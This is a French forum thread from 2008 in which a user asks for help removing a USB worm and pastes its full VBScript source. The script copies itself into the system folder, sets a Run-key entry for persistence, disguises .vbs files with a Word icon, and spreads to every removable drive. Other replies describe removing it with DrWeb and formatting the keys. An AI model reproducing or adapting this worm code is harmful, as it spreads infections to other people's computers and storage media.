The_cars.vbs

Com_A · Novembre 7, 2008, 12:12

La clée et le DD, l’infection alimentant l’un et l’autre dès que l’on rebranche une clée. A mon avis le mieux c’est encore de formater la clée USB, de la retirer, et d’essayer de s’attaquer directement aux fichiers présents sur la racine du DD :neutre:

Mais après si il arrive à tout virer d’un coup, avec clée branchée, c’est encore mieux c’est sûr

majkb_1_1 · Novembre 7, 2008, 1:45

ESET pas de résultats

je commence superantispyware

majkb_1_1 · Novembre 7, 2008, 2:01

Voila toujours ce qui se cache dans ce script de merde qui se fou sur mes clés usb:

’ |-----0------------------------/0-----|
’ |-----0---/\GOOD ADVENTURE/--/-0-----|
’ |-----0–/ -----LA-----/ /–0-----|
’ |-----0–/\ /–PUISSANCE-\ /--0-----|
’ |-----0-/–/-----2008-----/–-0-----|
’ |-----0/------------------------\0-----|

'vbsfile=« getspecialfolder(1)\WScript.exe, 2 »
on error resume next
Target =« HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FIXEDFON.FON »
Noun=« Path%%%.txt »
Set FSO = CreateObject(« Scripting.FileSystemObject »)
Set WSSH = CreateObject(« WScript.Shell »)
Set fold = FSO.GetSpecialFolder(1)
fold1 = cstr(fold)
location1 = wscript.scriptfullname
if instr(location1,fold1)=false then
wssh.run mid(wscript.scriptfullname,1,3)
if (fso.fileexists(Fold & « \Win32.vbs »)) then
else
UP
result = wssh.regread ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\DefaultIcon")
wssh.Regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Vbsfile\DefaultIcon",result
chmn1=Fold
prov1=mid(location1,1,len(location1)-13)
PhotoC prov1
end if
else
Do while time <> « 00:00:00 »
if not proc() then
Exec1 fold & « \Ecran »
end if
SUK
wscript.sleep 100
Loop
end if

Sub Exec1(exe)
wssh.run exe
End sub

Function proc()
proc=false
Set objWMI = GetObject(« winmgmts:root\cimv2 »)
sQuery = « Select * from Win32_process »
For Each oproc In objWMI.execquery(sQuery)
if oproc.Name= "Ecran.exe"then
proc=true
exit for
end if
Next
Set objWMI = Nothing
End function

sub UP()
set lieu = FSO.GetSpecialFolder(1)
set wssh = CreateObject(« WScript.Shell »)
wssh.regwrite Target,FSO.GetSpecialFolder(1) & « \Win32.vbs »
end sub

sub PhotoC(provien)
on error resume next
Dim FSO1,Flder
DateCreate FSO.GetSpecialFolder(1) & « \Win32.vbs »
if not (fso.fileexists(FSO.GetSpecialFolder(1) & « \VB6FR.DLL »)) then
fso.copyfile provien & « \THe Girls\VB6FR.DLL » ,FSO.GetSpecialFolder(1) & « \VB6FR.DLL »,true
end if
if not (fso.fileexists(FSO.GetSpecialFolder(1) & « \MSCMCFR.DLL »)) then
fso.copyfile provien & « \THe Girls\MSCMCFR.DLL » ,FSO.GetSpecialFolder(1) & « \MSCMCFR.DLL »,True
end if
fso.copyfile provien & « \THe Girls\Ecran.exe » ,FSO.GetSpecialFolder(1) & « \Ecran.exe »,true
Set FSO1 = CreateObject(« Scripting.FileSystemObject »)
FSO1.CopyFolder provien & « \THe Girls » ,FSO.GetSpecialFolder(1) & « \THe Girls »,True
end sub
sub PhotoC1(Chemin,nomfich)
Dim FSO1
fso.copyfile wscript.scriptfullname ,Chemin & "" & nomfich,true
fso.copyfile FSO.GetSpecialFolder(1) & « \Ecran.exe » ,Chemin & « \Ecran.exe »,true
Set FSO1 = CreateObject(« Scripting.FileSystemObject »)
FSO1.CopyFolder FSO.GetSpecialFolder(1) & « \THe Girls » ,chemin & « \THe Girls »,True
end sub

sub SUK()
Dim suk1, suk2,unite1,fso,f,fso1
Set FSO = CreateObject(« Scripting.FileSystemObject »)
Set FSO1 = CreateObject(« Scripting.FileSystemObject »)
Set suk2 = fso.Drives
For Each suk1 in suk2
Unite1 = suk1.Driveletter & « : »
TypeUnit= detectamovibles(Unite1)
if TypeUnit =« UK » and suk1.isready then
if not (fso.fileexists(Unite1 & « \The_Cars.vbs »)) then
PhotoC1 Unite1 ,« The_Cars.vbs »
Set f = fso1.OpenTextFile(fold & "" & Noun, 2,true)
f.write(unite1)
else
end if
end if
Next
end sub

Function detectamovibles(drvpath)
Dim fso, d, s, t
Set fso = CreateObject(« Scripting.FileSystemObject »)

Set d = fso.GetDrive(fso.GetDriveName(fso.GetAbsolutePathName(drvpath)))
Select Case d.DriveType
Case 0: t =« Inconnu »
Case 1: t =« UK »
Case 2: t =« F »
Case 3: t =« Réso »
Case 4: t =« CDR »
Case 5: t =« RD »
End Select
detectamovibles=t
end function
sub DateCreate(LieuplusFile)
Dim fso, f, f2, ts, ts2
Dim Ligne
Set FSO = CreateObject(« Scripting.FileSystemObject »)
Set f = fso.GetFile(wscript.scriptfullname)
Set ts = f.OpenAsTextStream(1, -2)
fso.CreateTextFile LieuplusFile
Set f2 = fso.GetFile(LieuplusFile)
Set ts2 = f2.OpenAsTextStream(2, -2)

do
Ligne = ts.readline
ts2.write Ligne & vbcrlf
loop until ts.AtEndOfStream
ts.Close
ts2.write « ' » & date
ts2.Close
end sub
'10/10/2008
'10/10/2008

majkb_1_1 · Novembre 7, 2008, 2:31

Ya pas moyen, par hasard, de modifier tout le code (quitte à tout retirer) du fichier win32.vbs dans system32 et celui de mes clés the_cars.vbs comme apparemment il existe pas vraiment de virus…?

majkb_1_1 · Novembre 7, 2008, 3:23

Voila, enfin quelque chose qui suspect quelque chose: DRWeb me trouve bien un fichier Script win32.vbs pouvant être suspect et me proposer de l’éradiquer. Il s’exécute, demande un redémarrage du pc. Chose faite, je formate vite mes 2 clés et rien ne se réinstalle par au dessus même après débranché-rebranché.

Com_A · Novembre 7, 2008, 5:48

Bon ben ca a l’air d’avoir marché apparement [:paysan].
Essaye peut être tes autres DD externes, ils méritent sans doute un coup de DrWeb si tu les avais branchés récemment sur ta machine infectée.

majkb_1_1 · Novembre 7, 2008, 7:08

Ouais je vais voir ce weekend, la je suis à mon kot avec mon pc portable, je vais voir avec le pc fixe à la maison mais je n’y ai pas touché depuis pas mal de temps (en tout cas je n’ai pas souvenir d’y avoir transféré des fichiers par clés usb) donc normalement tout est impec.
Merci pour le coup de main